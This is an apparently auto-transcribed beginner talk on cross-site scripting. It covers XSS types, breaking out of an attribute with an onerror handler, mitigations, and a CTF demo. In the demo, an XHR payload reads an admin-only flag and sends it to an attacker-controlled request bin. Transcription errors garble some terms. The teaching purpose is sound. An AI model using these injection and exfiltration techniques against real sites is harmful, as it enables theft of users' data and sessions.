Cross Site Scripting 101

uh hey everyone uh I'm Nero we're gonna kick off the village talk right now this is I think I'm getting feedback from this one okay cool uh so hey I'm little uh we're gonna kick off the talk right now uh today's talk is about cross-eyed scripting it is a one-on-one talk so if you're here expecting in-depth stuff about cross-site scripting not to talk for you but if you're here just to kind of get to know what exercise is and try your hand at a beginner friendly CTF challenge you've come to the right talk so before I kick things off I do want to give a shout out to my colleagues Jenna David and kodo whose slides I've

liberally used here and a big shout out to them for like letting me borrow their slides so a brief intro I'm Nero I'm a security engineer at Google my day job is to break into things as a red teamer in my free time I do try to write CTF challenges be it web or mobile or Cloud I'm also one of the core organizers of the precise as a CTF so you'll probably see me at the CDF room we swing by there so if you have any questions after the stocks feel free to drop in there and I'm happy to field all of them cool with that let's dive into xss web kind of has its own different class

of vulnerabilities um which is not surprising right like we've kind of sprouted out of nowhere it became a really big thing and security has been running behind that carriage since it started um one of the classes of vulnerabilities that you see a lot in web is injection style vulnerabilities what does that mean this typically happens when user data is taken and just plopped in and treated as code so it happens when user Supply data isn't treated as data but is treated as code and exercise is just a type of injection vulnerability which is dealing with JavaScript so attacker given JavaScript is added to the request it goes to to the server comes back in the response

that's at core what exercise is so let's take this example here you can see that the title is something that the user controls right it can be something as innocuous as let's say Corgi because corgis are awesome and everyone should love corby's so let's say we put Corgi in there it gets plopped right into the header field and you see it in the response but not all people using your app are good people some of them might try breaking into it so what happens if they try to plug in JavaScript let's use the infamous you know alert box that everyone loves to use in xss if you're not you know escaping your responses or the user uh provided data

it's just going to come back in the response and the browser goes well this is Javascript I'm gonna render it it doesn't care who supplied the JavaScript as long as it shows up it the browser is just going to render so this particular type of injection issue is what is xss and as at its core like we just discussed it happens when user Supply data is treated as code and not as data and at the end of the day the browser doesn't care what's being supplied to it it's your job as an application developer to actually make sure that it's properly escaped before we jump into xss one of the things that we need to dive into is

context because this is really important for you to understand how to write xss payloads at work as you can see a web page kind of has a lot of different contexts you have HTML context you have URL context you have JavaScript context it gets really confusing really fast and depending on where your data ends up as an attacker you need to make sure you understand what that context is and you can run your payload within that context um and one of the things you'll also notice is you can have nested context as well and what do you do as someone who's writing a web app do you try to like juggle all these rules in your head the

short answer is no and that's where we'll talk about template systems towards the end for mitigations but enough about you know trying to protect things we came to the store to try and understand how xss works and how to break things so let's get back to that

let's pick a very simple example and let's walk through it to try and understand how right Nexus is payload here is a very simple image tag the full bar is the user Supply data and you control it so if you as an attacker control that how do you make this into an exercise first things first to write a payload that actually works you need to be in a JavaScript context because you need to be able to write run your code and right now where you're at is inside the name of an image or the source of image which isn't really JavaScript context so this is not going to be useful for us so first things first let's get out of this

context and enter a new one so all you have to do is add that little quotes there so you get out of this context right now next up great this is not a JavaScript context we can't run or payload here but we can make it a JavaScript context and you're inside an image tag so why not leverage event handlers so let's say we add an image that doesn't exist and we just say on error you're going to do what I say you should do so now that we close the codes we're opening a new context with on error and a port now comes the fun part this is where you write your actual payload since you're

in the JavaScript context fine let's start with the alert box I think that's where all of us start our exercise payloads let's do the infamous alert box so we added that this is an optional step you've already achieved xss this will run if the you know user Supply data isn't properly escaped this will this is endgame but you can go a step further right now what's going to happen is that dot PNG closing race is going to show up on the web page you don't want that don't be sloppy be better hide your tracks so how do you ID tracks you can do something as simple as just introduce an additional parameter a because a is the first letter it's easy

to remember we just put a equals code so now it kind of closes out all things the end right so dot PNG code closes out you get the end tag for the image so you get no visible indicator that some Shenanigans up great now that you understand how roughly write payloads what excess is let's dive into the different types of xss because understanding the different types of xss will help you understand where to look for xss the first one is reflected xss this is fairly simple um you as a attacker are supplying JavaScript payload it makes its way to the server and it comes right back to you uh hence the name reflected a good

example for this is a search query like in a search query imagine entering the JavaScript payload makes it basic server comes back as you searched for so and so and that's a good example of places where the the response is thrown right back to you and that's a good reflected xss example next up is stored you know reflected was nice it went to the server came back but what if I want to do something else like what if I want to hit more people uh you can't send the reflected xss tailor to someone you can see it get executed but Stone exercise is kind of cooler where what you're giving it the payload as an

attacker to the server it gets stored in the database and it gets fetched every single time someone visits our page a good example of this is let's say you go to a forum you find a place where you can inject this you inject this payload it gets stored in the database and anytime someone comes and visits that Forum your comment is like pick back up and serve to them so the main the difference here is that it is actually stored on the server component finally comes Tom xss this one is different from the two types we just covered where the server is typically not involved so everything happens on the client side um a good example of this is you know

you get the pound sign often times on the URL that's the location hash and this is actually never sent to the server it it's only ever viewed by the browser it's oftentimes to like shift your view in a page it can be used to change the colors on the page so what happens is the user Supply data is taken and it's actually processed by the JavaScript on the page itself and it's plugged into the page so in this case you'll see that U is actually a parameter it's a variable that's actually filled in with user Supply data and it's plugged all the way into the inner HTML and written back right so everything happens on the client side

there's no server involvement here so with this knowledge in mind you now know where to look for the various types of xss it is a pretty prevalent attack class vulnerability class you're probably going to stumble into it at some point obviously don't you know go willy-nilly and try these things maybe try it through a bug Bounty programs right through ctfs be responsible with this knowledge now that you know how to find xss what are the different types of exercise let's briefly also discuss how to mitigate xss at the end of the day what we can do as people who write web apps is to make sure that user control data we don't trust it we never trust user control

data and we always make sure that we use template systems that are going to do strict contextual Auto escaping for us so that way you don't juggle any of the rules in your head everything's taken care of for you by the template systems the other thing which is really cool and is being introduced now is trusted types quotas actually the one who introduced it and it's really cool for locking down risky functions that you're coming across in JavaScript finally CSP think of this as a safety net if everything goes wrong CSP will hopefully catch you but CSP is not a Panacea you can't use it as a substitute for using tablet systems or Escape escaping the user content

cool the theory out of the way let's jump into the demo we'll be using the web tutorial one right now if you have your laptops feel free to follow along or you can also try this later we're going to keep this running until end of day tomorrow or probably even further than that so these web tutorial challenges one two and three are set up to be beginner friendly and the first one is very basic you can give it a script alert one and it will absolutely work there is no escaping that's happening on uh the server so you can check out these challenges at cdfbsites.net or you can just hit that URL directly I will leave the slide up

for a second in case people want to pull the URL and next one cool the goal of this is not to get an alert box because that's the other thing about xss you can use JavaScript you can do anything you want in this particular case we want you to focus on learning how to write good xss payloads it's not about writing the alert one box we are better than that what I want you to do is steal the xss one flag however there's a catch you can't access the flag as players only the admin can access the flag so what do you do this is a bit of a contrived example but it works so what we're trying to teach

you any requests that you send from your session will be sent to the admin and the admin will do the exact same thing so whatever you do the admin is going to mirror that so while you can't get the exercise one flag the admin can actually absolutely get that flag so what do you do in terms of writing a payload what you can do is you request the flag you read the flag and you add the additional step of you write the flag somewhere every attacker can read the flag so it's now one additional step but it does get you to the flag great you might be like hey I don't know JavaScript I do want to learn it later

but can you break it down for me and explain how this payload works well that's where xhr comes in I know the slide colors are not great but I'll upload the slides and you can't you can all see it but at the end of the day what this payload does is it uses XML HTTP requests to say hey I want the flag give me the flag and then it reads the contents of that response and then sends out another request in this case the last request is to something you control as an attacker so it says give me the flag reads the flag sends you the flag so three little steps to get you to the goal

great you might be like okay I don't want to set up a server I want the flag what's the best way to get to the flag you can use services like request win which is really for testing to see hey if I send a request can I just get it uh posted somewhere and I can just pick it up and do some testing request pin is great for it you can actually set up a public bin for it and anything you send to it you will be able to view it in the sidebar with that let's jump into the payload and I'm going to mirror my display in a second

awesome let's get that you can see that I've already set up a request when there let me copy that payload for now first things first let's actually go to this page we try to make this easy for you and said hey if you're going to look at CSP and you don't know what CSP is we've actually built in hints here so you can actually look at the CSV policy alternatively if you are using Chrome you can actually right click inspect you'll see the network tab you can refresh it you'll see the CSV headers right there so let's actually copy the CSV headers for a second and plug it into this really Nifty tool that our colleague wrote which I right

now have the payload I'm going to park the payload here and copy this

so you can actually check that CSV policy using CSP evaluator really helpful to tells you like what can possibly go wrong with your policy if you're running any tests so you're writing apps that require CSP do feel free to test this and in general CSP is a lot easier if you build it from the ground up when you're writing the app versus plugging it in later so just something to keep in mind cool so we have this sniffy little side let's try the script alert payload first

voila you know there is an exercise now and you can actually inspect or view source and you'll see that I am displaying the payload for you just so you know what you entered but you can also see it's getting rendered this is the part that's actually being run because the browser just goes oh there's JavaScript I should run this JavaScript so now let's run our payload uh what this is going to do is read the flag it's going to say uh you know so request the flag read the flag and send it to my request file great so if I view this and I try not to inspect it

refresh that you'll see that I am requesting the flag and you can also see that the flag is being sent to my service uh my respect question so you know this is working so let me switch over to my request pin and you will see two requests here because the admin mirrored my request and hopefully sent me back the flag so that's about it it's as simple as that so now that you've tried your hand at this go ahead you know like if it's your first time trying it try the web tutorial one try to solve this um again the solution is up I'm also going to post a slide soon on my Twitter account so feel free to look at it there

um one thing I would mention is Pep tutorial 2 is a slight variation of this so try your hand at that as well and again use CSP evaluator it's going to tell you where to poke holes and web tutorial 3 does have a Twist but if once you figure out xss I think you can solve it so that's pretty much it so thank you everyone for coming to the stock I will be at the CTF Village for the rest of the time here and you're welcome to hang out there and that's what it so thank you